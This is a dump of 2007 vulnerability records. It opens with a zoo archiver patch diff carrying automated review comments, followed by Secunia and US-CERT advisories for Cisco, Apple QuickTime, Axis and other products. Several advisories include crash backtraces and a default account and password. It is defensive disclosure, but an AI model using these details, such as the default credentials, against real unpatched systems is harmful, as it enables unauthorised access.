--- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400
+++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500
@@ -92,6 +92,7 @@
int show_mode = 0; /* show file protection */
#endif
int first_dir = 1; /* if first direntry -- to
adjust dat_ofs */
+unsigned long zoo_pointer = 0; /* Track our position in the file
*/
while (*option) {
switch (*option) {
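Review bot: this is a second, independent copy of the zoo_pointer bookkeeping that zooext.c also carries (the declaration here, the initialisation and the <= comparison in the next two hunks), and the two copies will drift the next time one of them is touched. A small shared helper, say check_next_offset(next, &zoo_pointer) called from both loops, keeps the fix in one place.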
@@ -211,6 +212,9 @@
show_acmt (&zoo_header, zoo_file, 0); /* show
archive comment */
}
+ /* Begin tracking our position in the file */
+ zoo_pointer = zoo_header.zoo_start;
+
/* Seek to the beginning of the first directory entry */
if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) {
ercount++;
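Review bot: zoo_pointer is assigned on the line before the `if (zooseek (...) != 0)` test, so on a failed seek the tracked position has already advanced while the file has not. Harmless if the ercount++ path leaves the listing, but moving the assignment into the success branch keeps the two positions in step and matches what the comment promises.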
@@ -437,6 +441,11 @@
if (verb_list && !fast)
show_comment (&direntry, zoo_file, 0, (char *) NULL);
} /* end if (lots of conditions) */
+
+ /* Make sure we are not seeking to already processed data */
+ if (direntry.next <= zoo_pointer)
+ prterror ('f', "ZOO chain structure is corrupted\n");
+ zoo_pointer = direntry.next;
/* ..seek to next dir entry */
zooseek (zoo_file, direntry.next, 0);
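Review bot: `direntry.next <= zoo_pointer` stops backward and self-referencing chains, but any forward offset is accepted, including one past the end of the archive, and the zooseek on the last line has no return check, so a truncated or wild pointer is only caught by whatever read follows. Check zooseek's result here (as the header seek earlier in this file does), or bound direntry.next by the archive size, so that case is reported as corrupt rather than left to a later read error.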
VIII. CREDITS
Jean-Sebastien Guay-Leroux found the bug and wrote the exploit for it.
IX. REFERENCES
1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669
2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670
3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671
4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672
5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673
X. HISTORY
2006-09-?? : Vulnerability is found
2007-03-19 : All vendors notified
2007-03-19 : Barracuda Networks provided a fix
2007-03-22 : Avira provided a fix
2007-04-02 : Panda Antivirus provided a fix
2007-04-14 : avast! antivirus provided a fix
2007-05-04 : Public disclosure
| VAR-200705-0183 | CVE-2007-1669 | zoo decoder 2.10, as used in Barracuda Spam Firewall and other products: denial of service (DoS) vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. The same zoo decoder is bundled in other products as well. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives.
A successful attack can exhaust system resources and trigger a denial-of-service condition.
This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm.
The vulnerability is caused due to an error in the handling of Zoo
archives. This can be exploited to cause an infinite loop resulting
in high CPU utilisation.
SOLUTION:
Update to firmware version 3.4 and virus definition 2.0.6399 or
later.
PROVIDED AND/OR DISCOVERED BY:
Jean-Sebastien Guay-Leroux
ORIGINAL ADVISORY:
Barracuda Networks:
http://www.barracudanetworks.com/ns/resources/tech_alert.php
Jean-Sebastien Guay-Leroux:
http://www.guay-leroux.com/projects/zoo-infinite-advisory.txt
| VAR-200705-0167 | CVE-2007-2239 | Axis Communications CamImage ActiveX control stack buffer overflow |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in the SaveBMP method in the AXIS Camera Control (aka CamImage) ActiveX control before 2.40.0.0 in AxisCamControl.ocx in AXIS 2100, 2110, 2120, 2130 PTZ, 2420, 2420-IR, 2400, 2400+, 2401, 2401+, 2411, and Panorama PTZ allows remote attackers to cause a denial of service (Internet Explorer crash) or execute arbitrary code via a long argument. Axis Camera Control is prone to a buffer-overflow vulnerability because it fails to sufficiently bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
Axis Camera Control versions prior to 2.40.0.0 are vulnerable to this issue.
The vulnerability is caused due to a boundary error when handling the
"SaveBMP()" method and can be exploited to cause a stack-based buffer
overflow via an overly long argument.
Successful exploitation allows execution of arbitrary code.
SOLUTION:
Update to version 2.40.0.0 or later.
http://www.axis.com/techsup/software/acc/files/AXISCameraControl.zip
PROVIDED AND/OR DISCOVERED BY:
Will Dormann, CERT/CC.
ORIGINAL ADVISORY:
Axis Communications:
http://www.axis.com/techsup/software/acc/files/acc_security_update_1_00.pdf
US-CERT VU#355809:
http://www.kb.cert.org/vuls/id/355809
| VAR-200705-0278 | CVE-2007-2580 | Apple Safari sensitive information disclosure vulnerability |
CVSS V2: 1.9 CVSS V3: - Severity: LOW |
Unspecified vulnerability in Apple Safari allows local users to obtain sensitive information (saved keychain passwords) via the document.loginform.password.value JavaScript parameter loaded from an AppleScript script. Apple Safari is prone to an unspecified local vulnerability.
Few technical details are currently available. We will update this BID as more information emerges.
| VAR-200705-0549 | CVE-2007-2502 | HP ProCurve 9300m Series switches denial of service (DoS) vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in HP ProCurve 9300m Series switches with software 08.0.01c through 08.0.01j allows remote attackers to cause a denial of service via unknown vectors, a different switch series than CVE-2006-4015. This is a different switch series from the one covered by CVE-2006-4015. A remote third party may be able to put the switch into a denial of service (DoS) state. This issue most likely occurs because the device fails to properly sanitize user-supplied input.
An attacker can exploit this issue to crash an affected device, effectively denying service to legitimate users.
This issue affects HP ProCurve 9300m Switches running software versions 08.0.01c to 08.0.01j.
The vulnerability is caused due to an unspecified error, which can be
exploited to cause a DoS. No more information is currently available.
The vulnerability is reported in versions 08.0.01c - 08.0.01j.
SOLUTION:
Install software version 07.8.03.
http://www.hp.com/rnd/software/switches.htm
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01034753
| VAR-200705-0565 | CVE-2007-2461 | Cisco PIX/ASA DHCP Relay Remote Denial of Service Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The DHCP relay agent in Cisco Adaptive Security Appliance (ASA) and PIX 7.2 allows remote attackers to cause a denial of service (dropped packets) via a DHCPREQUEST or DHCPINFORM message that causes multiple DHCPACK messages to be sent from DHCP servers to the agent, which consumes the memory allocated for a local buffer. NOTE: this issue only occurs when multiple DHCP servers are used. Separately, the Cisco ASA and PIX firewalls contain an authentication bypass vulnerability (see item 1 of the Secunia advisory below), which may allow a remote attacker to gain unauthorized access to the internal network or to the firewall itself. Cisco PIX and ASA are prone to a remote denial-of-service vulnerability because the software fails to properly handle DHCP packets in certain circumstances.
Successfully exploiting this issue allows attackers with access to a LAN served by a vulnerable device to consume excessive memory resources. This will eventually cause the device to stop forwarding further packets, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCsh50277. PIX is a firewall appliance that provides policy enforcement, multi-vector attack protection and secure connection services for users and applications; the Adaptive Security Appliance (ASA) is a modular platform that provides security and VPN services. When DHCPACK messages arrive from several DHCP servers in response to a single DHCPREQUEST or DHCPINFORM from a client, each one consumes a 1550-byte memory block on the relay agent. Once the pool of 1550-byte blocks is exhausted, the device starts dropping packets and can no longer forward traffic.
----------------------------------------------------------------------
TITLE:
Cisco PIX and ASA Denial of Service and Security Bypass
SECUNIA ADVISORY ID:
SA25109
VERIFY ADVISORY:
http://secunia.com/advisories/25109/
CRITICAL:
Moderately critical
IMPACT:
Security Bypass, DoS
WHERE:
From remote
OPERATING SYSTEM:
Cisco Adaptive Security Appliance (ASA) 7.x
http://secunia.com/product/6115/
Cisco PIX 7.x
http://secunia.com/product/6102/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco PIX and ASA, which
can be exploited by malicious people to bypass certain security
restrictions or cause a DoS (Denial of Service).
1) An unspecified error exists when using the LDAP authentication
mechanism, which can be exploited to bypass the authentication and
gain access to the device or the network.
Successful exploitation requires that the device uses the Layer 2
Tunneling Protocol (L2TP) and is configured to use LDAP servers with
an authentication protocol other than PAP, or that the device offers
remote management access (telnet, SSH, HTTP) and uses an LDAP AAA
server for authentication.
2) An unspecified error when using VPN connections configured with
password expiry can be exploited to cause a DoS.
Successful exploitation requires that the tunnel group is configured
with password expiry. In order to exploit this in IPSec VPN
connections, an attacker also needs to know the group name and group
password.
3) A race condition within the processing of non-standard SSL
sessions in the SSL VPN server of Cisco ASA appliances can be
exploited to cause the device to reload.
Successful exploitation requires that clientless SSL is used.
4) An error within the DHCP relay agent when handling DHCPACK
messages can be exploited to cause a DoS due to memory exhaustion by
sending a large number of DHCP requests to a vulnerable device.
Successful exploitation requires that devices are configured to use
the DHCP relay agent.
SOLUTION:
Apply updated software versions. Please see vendor advisories for
details.
PROVIDED AND/OR DISCOVERED BY:
1-3) Reported by the vendor.
4) Lisa Sittler and Grant Deffenbaugh, CERT/CC.
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20070502-asa.shtml
http://www.cisco.com/warp/public/707/cisco-sr-20070502-pix.shtml
http://www.cisco.com/en/US/products/products_security_response09186a0080833172.html
http://www.cisco.com/en/US/products/products_applied_intelligence_response09186a008083316f.html
US-CERT VU#530057:
http://www.kb.cert.org/vuls/id/530057
OTHER REFERENCES:
US-CERT VU#210876:
http://www.kb.cert.org/vuls/id/210876
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200705-0480 | CVE-2007-2463 | Cisco ASA clientless SSL VPN denial of service vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in Cisco Adaptive Security Appliance (ASA) and PIX 7.1 before 7.1(2)49 and 7.2 before 7.2(2)17 allows remote attackers to cause a denial of service (device reload) via unknown vectors related to VPN connection termination and password expiry. The Cisco ASA and PIX firewalls contain an authentication bypass vulnerability. This vulnerability may allow a remote attacker to gain unauthorized access to the internal network or firewall. The Cisco Adaptive Security Appliance contains a memory exhaustion vulnerability that may occur when the DHCP service relay is enabled. According to Cisco Systems, an attacker attempting to exploit this in IPSec VPN connections must know the group name and group password. Remote attackers may use this vulnerability to cause the device to fail to work normally or to bypass authentication. A successful attack can result in a device reload. This vulnerability is documented as software bug CSCsh81111.
| VAR-200705-0566 | CVE-2007-2462 | Cisco ASA clientless SSL VPN denial of service vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in Cisco Adaptive Security Appliance (ASA) and PIX 7.2 before 7.2(2)8, when using Layer 2 Tunneling Protocol (L2TP) or Remote Management Access, allows remote attackers to bypass LDAP authentication and gain privileges via unknown vectors. The Cisco ASA and PIX firewalls contain an authentication bypass vulnerability. This vulnerability may allow a remote attacker to gain unauthorized access to the internal network or firewall. The Cisco Adaptive Security Appliance contains a memory exhaustion vulnerability that may occur when the DHCP service relay is enabled. According to Cisco Systems, there is no impact if LDAP authentication is configured to use PAP (Password Authentication Protocol). A third party can bypass LDAP authentication and gain unauthorized access to the appliance and internal resources. PIX is a firewall device that provides policy enforcement, multi-vector attack protection and secure connection services for users and applications; Adaptive Security Appliance (ASA) is a modular platform that provides security and VPN services. Remote attackers may use this vulnerability to cause the device to fail to work normally or to bypass authentication. Access to the management session must be explicitly enabled in the device configuration and restricted to defined IP addresses only. This vulnerability is documented in Cisco Bug ID as CSCsh42793.
| VAR-200705-0481 | CVE-2007-2464 | Cisco ASA clientless SSL VPN denial of service vulnerability |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Race condition in Cisco Adaptive Security Appliance (ASA) and PIX 7.1 before 7.1(2)49 and 7.2 before 7.2(2)19, when using "clientless SSL VPNs," allows remote attackers to cause a denial of service (device reload) via "non-standard SSL sessions." The Cisco ASA and PIX firewalls contain an authentication bypass vulnerability. This vulnerability may allow a remote attacker to gain unauthorized access to the internal network or firewall. The Cisco Adaptive Security Appliance contains a memory exhaustion vulnerability that may occur when the DHCP service relay is enabled. Remote attackers may use this vulnerability to cause the device to fail to work normally or to bypass authentication. This vulnerability is documented as bug CSCsi16248.
| VAR-200705-0156 | CVE-2007-0745 | Apple Security Update 2007-004 Directory access vulnerability |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
The Apple Security Update 2007-004 uses an incorrect configuration file for FTPServer in Apple Mac OS X Server 10.4.9, which might allow remote authenticated users to access additional directories. Mac OS X Server is prone to a remote security vulnerability.
| VAR-200704-0470 | CVE-2007-2282 | Cisco NetFlow Collection Engine contains known default passwords |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Cisco Network Services (CNS) NetFlow Collection Engine (NFC) before 6.0 has an nfcuser account with the default password nfcuser, which allows remote attackers to modify the product configuration and, when installed on Linux, obtain login access to the host operating system. A vulnerability in the Cisco NetFlow Collection Engine could allow a remote attacker to gain access to a vulnerable system. This issue stems from a design flaw that makes an insecure account available to remote users.
Versions of Cisco NFC prior to 6.0 are vulnerable to this issue.
Cisco is tracking this issue as Cisco Bug ID CSCsh75038. NFC is installed on a supported UNIX platform. During installation, a default web-based user account named nfcuser with the password nfcuser is created; it is used for application maintenance, configuration, and troubleshooting. Before version 6.0, the Linux installer also creates a local operating-system user named nfcuser whose default password is identical to the user name. If that account already exists, the Linux installer changes its password to match the user name.
| VAR-200704-0483 | CVE-2007-2295 | Apple QuickTime fails to properly handle malformed movie files |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in the JVTCompEncodeFrame function in Apple Quicktime 7.1.5 and other versions before 7.2 allows remote attackers to execute arbitrary code via a crafted H.264 MOV file. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime is a popular multimedia player that supports many media formats.
QuickTime has a buffer overflow vulnerability when processing malformed MOV files; a remote attacker could exploit it to take control of the user's machine.
If QuickTime loads a malformed .mov file, the JVTCompEncodeFrame() function may fail to parse the malformed data correctly and trigger a heap overflow; the player then stops responding with a segmentation fault, or arbitrary instructions are executed with the privileges of the logged-in user.
The debugging information is as follows:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00041656
0x90003646 in szone_malloc ()
(gdb) bt
#0 0x90003646 in szone_malloc ()
#1 0x90003527 in malloc_zone_malloc ()
#2 0x90325591 in mem_heap_malloc ()
#3 0x90325511 in shape_alloc_bounds ()
#4 0x9170d8ec in RectRgn ()
#5 0x91726437 in SetRectRgn ()
#6 0x9436d3b4 in ICMDeviceLoop ()
#7 0x9437728a in DecompressSequenceFrameWhen ()
#8 0x94376c3a in ICMDecompressionSessionDecodeFrame ()
#9 0x98b0c58c in v2m_rDecompressSequenceFrameWhen ()
#10 0x98b1333b in v2m_decompressVideoFrame ()
#11 0x98b13cd7 in QueueAFrame ()
#12 0x98b14d49 in v2m_doWhatTheMentorTellsUs ()
#13 0x98b166ac in Video2MoviesTask ()
#14 0x90cceccf in CallComponentFunctionCommon ()
#15 0x98b056c0 in Video2ComponentDispatch ()
#16 0x90cce7f8 in CallComponentDispatch ()
#17 0x94369f27 in MediaMoviesTask ()
#18 0x94368c04 in TaskMovie_priv ()
#19 0x98bb9b42 in doIdleMovie ()
#20 0x98bc8691 in internalDoAction ()
#21 0x98bb9a1a in _MCIdle ()
#22 0x90cceb13 in CallComponentFunctionCommon ()
#23 0x98bb4f19 in _MCComponentDispatch ()
#24 0x90cce7f8 in CallComponentDispatch ()
#25 0x943679fc in MCIdle ()
#26 0x9436664d in QTOMovieObject::SendCommand ()
#27 0x9433b1e2 in DispatchQTMsg ()
#28 0x9433af0f in QTObjectTokenPriv::SendMessageToObject ()
#29 0x9433a338 in QTObjectTokenPriv::DispatchMessage ()
#30 0x9436646a in QTSendToObject ()
#31 0x95a21142 in QTObjectTokenExecuteCommand ()
#32 0x95a32f85 in -[QTMovie idle] ()
#33 0x9082a6eb in CFSetApplyFunction ()
#34 0x95a2feab in +[QTMovie idleAllMovies:] ()
#35 0x9282c2de in __NSFireTimer ()
#36 0x9082c7e2 in CFRunLoopRunSpecific ()
#37 0x9082bace in CFRunLoopRunInMode ()
#38 0x92dd78d8 in RunCurrentEventLoopInMode ()
#39 0x92dd6fe2 in ReceiveNextEventCommon ()
#40 0x92dd6e39 in BlockUntilNextEventMatchingListInMode ()
#41 0x9327d465 in _DPSNextEvent ()
#42 0x9327d056 in -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] ()
#43 0x93276ddb in -[NSApplication run] ()
#44 0x9326ad2f in NSApplicationMain ()
#45 0x00040632 in _start ()
#46 0x0004054d in start ()
(gdb)
Failed exploit attempts likely result in denial-of-service conditions. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats. Remote attackers may take advantage of this vulnerability to control the user's machine. If a malformed .mov file is loaded using QuickTime, the JVTCompEncodeFrame() function may not parse the malformed data correctly, trigger a heap overflow, the player may stop responding due to a segmentation fault, or execute arbitrary commands with the privileges of the logged-in user.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now
available:
http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
----------------------------------------------------------------------
TITLE:
Apple QuickTime Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26034
VERIFY ADVISORY:
http://secunia.com/advisories/26034/
CRITICAL:
Highly critical
IMPACT:
Exposure of sensitive information, DoS, System access
WHERE:
From remote
REVISION:
1.1 originally posted 2007-07-12
SOFTWARE:
Apple QuickTime 7.x
http://secunia.com/product/5090/
DESCRIPTION:
Some vulnerabilities have been reported in Apple QuickTime, which can
be exploited by malicious people to compromise a user's system.
1) An unspecified error exists in the processing of H.264 movies.
This can be exploited to cause memory corruption and may allow
execution of arbitrary code when a user accesses a specially crafted
H.264 movie.
2) An unspecified error exists in the processing of movie files.
4) An integer overflow error exists in the handling of the "author"
and "title" fields when parsing SMIL files.
5) A design error exists in QuickTime for Java, which can be
exploited to disable security checks and execute arbitrary code when
a user visits a web site containing a specially crafted Java applet.
6) A design error exists in QuickTime for Java, which can be
exploited to bypass security checks and read and write to process
memory. This can lead to execution of arbitrary code when a user
visits a web site containing a specially crafted Java applet.
7) A design error exists in QuickTime for Java due to JDirect
exposing interfaces that may allow loading arbitrary libraries and
freeing arbitrary memory.
8) A design error exists in QuickTime for Java, which can be
exploited to capture the user's screen content when a user visits a
web site containing a specially crafted Java applet.
The vulnerabilities are reported in versions prior to 7.2.
SOLUTION:
Update to version 7.2.
QuickTime 7.2 for Mac:
http://www.apple.com/support/downloads/quicktime72formac.html
QuickTime 7.2 for Windows:
http://www.apple.com/support/downloads/quicktime72forwindows.html
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Tom Ferris, Security-Protocols.com and Matt
Slot, Ambrosia Software, Inc.
2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software.
3) The vendor credits Tom Ferris, Security-Protocols.com.
4) David Vaartjes of ITsec Security Services, reported via iDefense.
5, 6, 7) The vendor credits Adam Gowdiak.
8) Reported by the vendor.
CHANGELOG:
2007-07-12: Added link to US-CERT.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=305947
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
OTHER REFERENCES:
US-CERT VU#582681:
http://www.kb.cert.org/vuls/id/582681
National Cyber Alert System
Technical Cyber Security Alert TA07-193A
Apple Releases Security Updates for QuickTime
Original release date: July 12, 2007
Last revised: --
Source: US-CERT
Systems Affected
Apple QuickTime on systems running
* Apple Mac OS X
* Microsoft Windows
Overview
Apple QuickTime contains multiple vulnerabilities.
I. Description
Apple QuickTime 7.2 resolves multiple vulnerabilities in the way
Java applets and various types of media files are handled. Since QuickTime configures most
web browsers to handle QuickTime media files, an attacker could
exploit these vulnerabilities using a web page.
Note that QuickTime ships with Apple iTunes.
For more information, please refer to the Vulnerability Notes
Database.
II. For further information, please see
the Vulnerability Notes Database.
III. Solution
Upgrade QuickTime
Upgrade to QuickTime 7.2. This and other updates for Mac OS X are
available via Apple Update.
On Microsoft Windows, QuickTime users can install the update by
using the built-in auto-update mechanism, Apple Software Update, or
by installing the update manually. Disabling QuickTime in your web browser may defend
against this attack vector. For more information, refer to the
Securing Your Web Browser document. Disabling Java in your web browser may defend against
this attack vector. Instructions for disabling Java can be found in
the Securing Your Web Browser document.
References
* Vulnerability Notes for QuickTime 7.2 -
<http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72>
* About the security content of the QuickTime 7.2 Update -
<http://docs.info.apple.com/article.html?artnum=305947>
* How to tell if Software Update for Windows is working correctly when no updates are available -
<http://docs.info.apple.com/article.html?artnum=304263>
* Apple QuickTime 7.2 for Windows -
<http://www.apple.com/support/downloads/quicktime72forwindows.html>
* Apple QuickTime 7.2 for Mac -
<http://www.apple.com/support/downloads/quicktime72formac.html>
* Standalone Apple QuickTime Player -
<http://www.apple.com/quicktime/download/standalone.html>
* Mac OS X: Updating your software -
<http://docs.info.apple.com/article.html?artnum=106704>
* Securing Your Web Browser -
<http://www.us-cert.gov/reading_room/securing_browser/>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA07-193A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA07-193A Feedback VU#582681" in the
subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2007 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
Thursday July 12, 2007: Initial release
| VAR-200704-0420 | CVE-2007-2296 | Apple QuickTime fails to properly handle malformed movie files |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Integer overflow in the FlipFileTypeAtom_BtoN function in Apple Quicktime 7.1.5, and other versions before 7.2, allows remote attackers to execute arbitrary code via a crafted M4V (MP4) file. Apple QuickTime fails to properly handle malformed movie files. Failed exploit attempts likely result in denial-of-service conditions. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats. A vulnerability exists in QuickTime's handling of MP4 files containing malformed data. Attackers may exploit this vulnerability to gain control of users' machines by tricking them into processing malicious MP4 files. The debugging information is as follows:
Reason: KERN_PROTECTION_FAILURE at address: 0x00458000
0x9431cc63 in FlipFileTypeAtom_BtoN ()
(gdb) bt
#0 0x9431cc63 in FlipFileTypeAtom_BtoN ()
#1 0x9431c208 in PrivateNewMovieFromDataFork_priv ()
#2 0x9431b04a in NewMovieFromFilePriv ()
#3 0x943177d5 in NewMovieFromDataRefPriv_priv ()
#4 0x943164b2 in NewMovieFromProperties_priv ()
#5 0x95a24920 in -[QTMovie initWithAttributes:error:] ()
#6 0x95a22f31 in +[QTMovie movieWithAttributes:error:] ()
#7 0x0000adb7 in -[QTPMovieDocument:File]Type readFrom:.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now
available:
http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
----------------------------------------------------------------------
TITLE:
Apple QuickTime Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26034
VERIFY ADVISORY:
http://secunia.com/advisories/26034/
CRITICAL:
Highly critical
IMPACT:
Exposure of sensitive information, DoS, System access
WHERE:
>From remote
REVISION:
1.1 originally posted 2007-07-12
SOFTWARE:
Apple QuickTime 7.x
http://secunia.com/product/5090/
DESCRIPTION:
Some vulnerabilities have been reported in Apple QuickTime, which can
be exploited by malicious people to compromise a user's system.
1) An unspecified error exists in the processing of H.264 movies.
This can be exploited to cause memory corruption and may allow
execution of arbitrary code when a user accesses a specially crafted
H.264 movie.
2) An unspecified error exists in the processing of movie files.
4) An integer overflow error exists in the handling of the "author"
and "title" fields when parsing SMIL files.
5) A design error exists in QuickTime for Java, which can be
exploited to disable security checks and execute arbitrary code when
a user visits a web site containing a specially crafted Java applet.
6) A design error exists in QuickTime for Java, which can be
exploited to bypass security checks and read and write to process
memory. This can lead to execution of arbitrary code when a user
visits a web site containing a specially crafted Java applet.
7) A design error exists in QuickTime for Java due to JDirect
exposing interfaces that may allow loading arbitrary libraries and
freeing arbitrary memory.
8) A design error exists in QuickTime for Java, which can be
exploited to capture the user's screen content when a user visits a
web site containing a specially crafted Java applet.
The vulnerabilities are reported in versions prior to 7.2.
SOLUTION:
Update to version 7.2.
QuickTime 7.2 for Mac:
http://www.apple.com/support/downloads/quicktime72formac.html
QuickTime 7.2 for Windows:
http://www.apple.com/support/downloads/quicktime72forwindows.html
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Tom Ferris, Security-Protocols.com and Matt
Slot, Ambrosia Software, Inc.
2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software.
3) The vendor credits Tom Ferris, Security-Protocols.com.
4) David Vaartjes of ITsec Security Services, reported via iDefense.
5, 6, 7) The vendor credits Adam Gowdiak.
8) Reported by the vendor.
CHANGELOG:
2007-07-12: Added link to US-CERT.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=305947
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
OTHER REFERENCES:
US-CERT VU#582681:
http://www.kb.cert.org/vuls/id/582681
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keep their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
National Cyber Alert System
Technical Cyber Security Alert TA07-193A
Apple Releases Security Updates for QuickTime
Original release date: July 12, 2007
Last revised: --
Source: US-CERT
Systems Affected
Apple QuickTime on systems running
* Apple Mac OS X
* Microsoft Windows
Overview
Apple QuickTime contains multiple vulnerabilities.
I. Description
Apple QuickTime 7.2 resolves multiple vulnerabilities in the way
Java applets and various types of media files are handled.
Since QuickTime configures most web browsers to handle QuickTime
media files, an attacker could exploit these vulnerabilities using
a web page.
Note that QuickTime ships with Apple iTunes.
For more information, please refer to the Vulnerability Notes
Database.
II. For further information, please see
the Vulnerability Notes Database.
III. Solution
Upgrade QuickTime
Upgrade to QuickTime 7.2. This and other updates for Mac OS X are
available via Apple Update.
On Microsoft Windows, QuickTime users can install the update by
using the built-in auto-update mechanism, Apple Software Update, or
by installing the update manually.
Disabling QuickTime in your web browser may defend against this
attack vector. For more information, refer to the Securing Your Web
Browser document.
Disabling Java in your web browser may defend against this attack
vector. Instructions for disabling Java can be found in the Securing
Your Web Browser document.
References
* Vulnerability Notes for QuickTime 7.2 -
<http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72>
* About the security content of the QuickTime 7.2 Update -
<http://docs.info.apple.com/article.html?artnum=305947>
* How to tell if Software Update for Windows is working correctly when no updates are available -
<http://docs.info.apple.com/article.html?artnum=304263>
* Apple QuickTime 7.2 for Windows -
<http://www.apple.com/support/downloads/quicktime72forwindows.html>
* Apple QuickTime 7.2 for Mac -
<http://www.apple.com/support/downloads/quicktime72formac.html>
* Standalone Apple QuickTime Player -
<http://www.apple.com/quicktime/download/standalone.html>
* Mac OS X: Updating your software -
<http://docs.info.apple.com/article.html?artnum=106704>
* Securing Your Web Browser -
<http://www.us-cert.gov/reading_room/securing_browser/>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA07-193A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA07-193A Feedback VU#582681" in the
subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2007 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
Thursday July 12, 2007: Initial release